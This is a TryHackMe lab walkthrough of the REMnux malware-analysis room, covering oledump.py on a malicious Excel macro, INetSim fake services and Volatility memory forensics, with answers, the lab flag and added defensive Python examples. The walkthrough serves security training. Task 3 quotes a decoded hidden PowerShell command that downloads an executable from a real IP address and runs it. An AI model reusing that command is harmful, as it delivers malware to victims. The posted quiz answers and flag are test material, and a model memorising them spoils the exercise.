REMnux: Getting Started – TryHackMe Walkthrough

Analyzing potentially malicious software can be difficult, especially during an active security incident. Analysts need reliable tools and controlled environments to safely investigate suspicious files. In this lab, we explored the REMnux Virtual Machine, a Linux distribution designed specifically for malware analysis and reverse engineering.

REMnux comes preinstalled with powerful tools such as:

  • Volatility

  • YARA

  • Wireshark

  • oledump.py

  • INetSim

These tools allow analysts to perform static analysis, dynamic analysis, network simulation, and memory forensics without risking their main system.


Task 1: Introduction

The room introduces the REMnux VM, which provides a sandbox environment for analyzing malware.

Learning objectives include:

  • Exploring tools inside the REMnux VM

  • Analyzing malicious documents

  • Simulating fake networks

  • Investigating memory images

Answer:
No answer needed.


Task 2: Machine Access

In this task, the REMnux VM is launched using the Start Machine button. The machine loads in a split-screen view where the virtual machine appears on the right side of the TryHackMe interface.

Most files used in the lab are located in:

/home/ubuntu/Desktop/tasks

Answer:
No answer needed.


Task 3: File Analysis with oledump.py

We analyzed a suspicious Excel file named:

agenttesla.xlsm

The tool used was oledump.py, which analyzes OLE2 (Object Linking and Embedding) compound files, the container format that holds a document's VBA project.

Command used:

oledump.py agenttesla.xlsm

The output revealed several data streams, including a VBA macro located in:

VBA/ThisWorkbook

To dump the raw contents of stream 4, the macro stream:

oledump.py agenttesla.xlsm -s 4

Macro source is stored compressed, so to decompress the VBA script in that stream:

oledump.py agenttesla.xlsm -s 4 --vbadecompress

The macro contained an obfuscated PowerShell command that downloaded malware from the internet.

After decoding using CyberChef, the script became readable:

powershell -WindowStyle hidden -executionpolicy bypass
Invoke-WebRequest -Uri http://193.203.203.67/rt/Doc-3737122pdf.exe
Start-Process

This command downloads a malicious executable and runs it.
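The --vbadecompress step undoes the MS-OVBA "compressed container" format in which Office stores macro source. The following is an added example, not code from the room or from oledump.py, that implements that decompression in Python and adds a small triage pass over the recovered source. The container bytes are hand-assembled for this example and do not come from agenttesla.xlsm; the marker list in SUSPICIOUS_MARKERS is an assumption of what an analyst would grep for first.

```python
# Added example: MS-OVBA compressed-container decompression (what
# oledump.py --vbadecompress performs) plus a simple keyword triage.

def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA compressed container and return the VBA source.

    Layout (MS-OVBA 2.4.1): a 0x01 signature byte, then chunks. Each chunk has
    a 2-byte little-endian header (bits 0-11: size-3, bit 15: compressed flag)
    followed either by raw bytes or by LZ77-style token sequences: a flag byte
    whose bits say which of the next 8 tokens are literals (0) or copies (1).
    """
    if not container or container[0] != 0x01:
        raise ValueError("missing MS-OVBA container signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3          # size including the header
        is_compressed = bool(header & 0x8000)
        chunk = container[pos + 2:pos + chunk_size]
        pos += chunk_size
        chunk_start = len(out)                      # decompressed offset of this chunk
        if not is_compressed:
            out += chunk                            # raw chunk: bytes stored as-is
            continue
        i = 0
        while i < len(chunk):
            flags = chunk[i]                        # one bit per following token
            i += 1
            for bit in range(8):
                if i >= len(chunk):
                    break
                if not (flags >> bit) & 1:
                    out.append(chunk[i])            # literal byte
                    i += 1
                    continue
                token = int.from_bytes(chunk[i:i + 2], "little")
                i += 2
                # The offset/length split of a copy token depends on how far
                # into the chunk we are: at least 4 offset bits, more later.
                difference = len(out) - chunk_start
                if difference == 0:
                    raise ValueError("copy token at start of chunk is invalid")
                bit_count = max((difference - 1).bit_length(), 4)   # ceil(log2(difference))
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > difference:
                    raise ValueError("copy token reaches before chunk start")
                for _ in range(length):             # byte-wise copy handles overlap
                    out.append(out[-offset])
    return bytes(out)


# Constructed container for this example (not from any real document):
#   01          container signature
#   06 b0       chunk header 0xB006: size 9, marker bits 0b011, compressed
#   08          flag byte: tokens 0-2 literal, token 3 a copy, token 4 literal
#   61 62 63    literals "abc"
#   06 20       copy token 0x2006: offset 3, length 9 -> appends "abcabcabc"
#   64          literal "d"
SAMPLE_CONTAINER = bytes.fromhex("01 06b0 08 616263 0620 64")

# Assumed starting points for a first look at decompressed macro source.
SUSPICIOUS_MARKERS = ("powershell", "shell", "wscript", "createobject",
                      "autoopen", "workbook_open", "document_open")


def suspicious_lines(vba_source: bytes):
    """Return (line_number, line) pairs that contain a marker, for triage."""
    hits = []
    for n, line in enumerate(vba_source.decode("latin-1").splitlines(), 1):
        low = line.lower()
        if any(marker in low for marker in SUSPICIOUS_MARKERS):
            hits.append((n, line.strip()))
    return hits


if __name__ == "__main__":
    print(decompress_vba(SAMPLE_CONTAINER))       # b'abcabcabcabcd'
```

On a real document the input to decompress_vba is the module stream starting at the offset the VBA dir stream records for that module (the MODULEOFFSET value); oledump locates that for you, which is why the single --vbadecompress flag is enough in the room.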

Answers

What Python tool analyzes OLE2 files?

Answer:
oledump.py


What parameter selects a specific data stream?

Answer:
-s


What PowerShell command downloads files from the internet?

Answer:
Invoke-WebRequest


What file was downloaded?

Answer:
Doc-3737122pdf.exe


Where was the file stored?

Answer:
$TempFile


How many data streams were found in possible_malicious.docx?

Answer:
16


Which data stream contained the macro?

Answer:
8


Task 4: Fake Network Simulation with INetSim

During malware analysis, we often want to observe network behavior safely. Instead of connecting to real internet servers, we can simulate them using INetSim.

INetSim creates fake services like:

  • HTTP

  • HTTPS

  • DNS

  • FTP

  • SMTP

Configuration

First, find the machine IP:

ifconfig

Then edit the INetSim configuration file:

sudo nano /etc/inetsim/inetsim.conf

Change:

dns_default_ip 0.0.0.0

to the machine's IP.

Start INetSim:

sudo inetsim

Once running, the fake network services are active.
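The configuration step above is a single edit, but it is easy to get wrong by hand (typo in the address, or editing the commented-out default line instead of the active one). The following added example, which is not part of the room or of INetSim, applies the same change from Python: it validates the address, replaces an active dns_default_ip line in place, and adds one if the setting is only present as a comment. It edits text passed in rather than touching /etc/inetsim/inetsim.conf directly, and only handles the one setting the room changes.

```python
# Added example: apply the room's dns_default_ip change to inetsim.conf text.
import ipaddress
import re

INETSIM_CONF = "/etc/inetsim/inetsim.conf"   # path used in the room

# Matches an active (uncommented) dns_default_ip line; [ \t] rather than \s so
# the match never swallows neighbouring blank lines.
_ACTIVE_LINE = re.compile(r"^([ \t]*)dns_default_ip[ \t]+\S+[ \t]*$", re.MULTILINE)


def set_dns_default_ip(conf_text: str, ip: str) -> str:
    """Return conf_text with dns_default_ip set to ip.

    An existing active line is rewritten in place (leading indentation kept);
    if the setting only appears commented out, or not at all, an active line
    is appended so the commented default stays as documentation.
    """
    ipaddress.IPv4Address(ip)               # raises ValueError on a bad address
    updated, count = _ACTIVE_LINE.subn(rf"\g<1>dns_default_ip {ip}", conf_text)
    if count == 0:
        if updated and not updated.endswith("\n"):
            updated += "\n"
        updated += f"dns_default_ip {ip}\n"
    return updated


def get_dns_default_ip(conf_text: str):
    """Return the active dns_default_ip value, or None if only commented/absent."""
    m = re.search(r"^[ \t]*dns_default_ip[ \t]+(\S+)", conf_text, re.MULTILINE)
    return m.group(1) if m else None


def update_conf_file(ip: str, path: str = INETSIM_CONF) -> None:
    """Rewrite the config file on disk; needs the same privileges as sudo nano."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(set_dns_default_ip(text, ip))


# Constructed fragment in the shape of the room's config; not the real file.
SAMPLE_CONF = (
    "# INetSim sample\n"
    "#dns_default_ip 10.10.10.1\n"
    "dns_default_ip 0.0.0.0\n"
    "http_bind_port 80\n"
)

if __name__ == "__main__":
    print(set_dns_default_ip(SAMPLE_CONF, "10.10.1.5"))
```

Run get_dns_default_ip on the file before and after the edit to confirm the active value changed; the answer to "what did INetSim actually bind" is in the file, not in what you remember typing.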


Downloading Files from the Fake Server

Using the AttackBox terminal:

sudo wget https://MACHINE_IP/second_payload.zip --no-check-certificate

This simulates malware downloading a second payload.

INetSim logs all activity and stores it in:

/var/log/inetsim/report/

Answers

What is the flag in flag.txt?

Answer:
Tryhackme{remnux_edition}


What HTTP method was used to retrieve flag.txt?

Answer:
GET


Task 5: Memory Investigation (Volatility)

Memory forensics helps analysts investigate malware running in RAM.

We used Volatility 3 to analyze a memory image:

wcry.mem

Plugins used include:

  • PsTree

  • PsList

  • CmdLine

  • FileScan

  • DllList

  • PsScan

  • Malfind

Example command:

vol3 -f wcry.mem windows.pstree.PsTree

Automating Analysis

Instead of running plugins one by one, we used a loop:

for plugin in windows.malfind.Malfind windows.psscan.PsScan windows.pstree.PsTree \
              windows.pslist.PsList windows.cmdline.CmdLine windows.filescan.FileScan \
              windows.dlllist.DllList; do
    vol3 -q -f wcry.mem $plugin > wcry.$plugin.txt
done

This saves outputs into text files for later analysis.


Extracting Strings

We also extracted readable strings from the memory dump.

ASCII strings:

strings wcry.mem > wcry.strings.ascii.txt

Little-endian Unicode:

strings -e l wcry.mem > wcry.strings.unicode_little_endian.txt

Big-endian Unicode:

strings -e b wcry.mem > wcry.strings.unicode_big_endian.txt
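The three strings commands differ only in which byte pattern counts as a character: one printable byte for ASCII, a printable byte followed by 0x00 for UTF-16 little-endian (-e l, how Windows stores most of its strings), and 0x00 followed by a printable byte for big-endian (-e b). The following added example, not code from the room or from binutils, reimplements that scan in Python over a constructed buffer so the three outputs can be compared side by side. It simplifies GNU strings slightly (tab is not treated as printable) and, like the real tool, scans at every byte offset, which has one consequence worth knowing and shown below.

```python
# Added example: ASCII / UTF-16LE / UTF-16BE string extraction in the style of
# strings, strings -e l and strings -e b.
import re

# One "character" per encoding: printable 7-bit ASCII, space through '~'.
_ENCODINGS = {
    "ascii":     (rb"[\x20-\x7e]",     "ascii"),
    "utf-16-le": (rb"[\x20-\x7e]\x00", "utf-16-le"),   # strings -e l
    "utf-16-be": (rb"\x00[\x20-\x7e]", "utf-16-be"),   # strings -e b
}


def extract_strings(data: bytes, encoding: str = "ascii", min_len: int = 4):
    """Return [(offset, text)] for every run of at least min_len characters.

    min_len=4 mirrors the strings(1) default. Matching is byte-offset based,
    exactly like GNU strings, so the scan does not assume 2-byte alignment.
    """
    unit, codec = _ENCODINGS[encoding]
    pattern = re.compile(rb"(?:%s){%d,}" % (unit, min_len))
    return [(m.start(), m.group().decode(codec)) for m in pattern.finditer(data)]


def string_report(data: bytes, min_len: int = 4):
    """The three passes the room runs, as one dict keyed by encoding name."""
    return {enc: extract_strings(data, enc, min_len) for enc in _ENCODINGS}


# Constructed "memory" buffer for this example: non-printable filler around an
# ASCII process name and a UTF-16LE file name (names taken from the room's
# answers, but the bytes are made up here, not from wcry.mem).
SAMPLE_MEMORY = (
    b"\x00\x01\x02\xff"
    + b"csrss.exe"
    + b"\x00\x00\x80"
    + "@WanaDecryptor@.exe".encode("utf-16-le")
    + b"\x01\x02\x03"
)

# Consequence of byte-offset scanning: a UTF-16LE string read one byte late
# looks like a UTF-16BE string missing its first character. Real strings -e b
# reports the same thing on little-endian data, so an analyst should expect
# "WanaDecryptor@.exe" to appear in the big-endian file as well.

if __name__ == "__main__":
    for enc, hits in string_report(SAMPLE_MEMORY).items():
        print(enc, hits)
```

When the three outputs of a real dump are compared, an artefact present only in the little-endian file is usually a Windows string (registry paths, file names, command lines), while the ASCII file carries mostly code-embedded constants and configuration; that difference is the reason the room runs all three passes rather than just strings.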

Answers

Which plugin lists processes in a tree?

Answer:
PsTree


Which plugin lists active processes?

Answer:
PsList


Which Linux utility extracts ASCII and Unicode strings?

Answer:
strings


First process suspected of injected code?

Answer:
csrss.exe


Second process suspected of injected code?

Answer:
winlogon.exe


Directory of @WanaDecryptor@.exe?

Answer:
C:\Intel\ivecuqmanpnirkt615


Conclusion

This room provided a practical introduction to the REMnux malware analysis environment.

We learned how to:

  • Analyze malicious documents with oledump.py

  • Decode obfuscated PowerShell commands

  • Simulate network activity with INetSim

  • Preprocess memory images using Volatility

  • Extract forensic artefacts using strings

REMnux contains many more tools for advanced malware analysis, and mastering them can significantly improve a cybersecurity analyst's investigation capabilities.
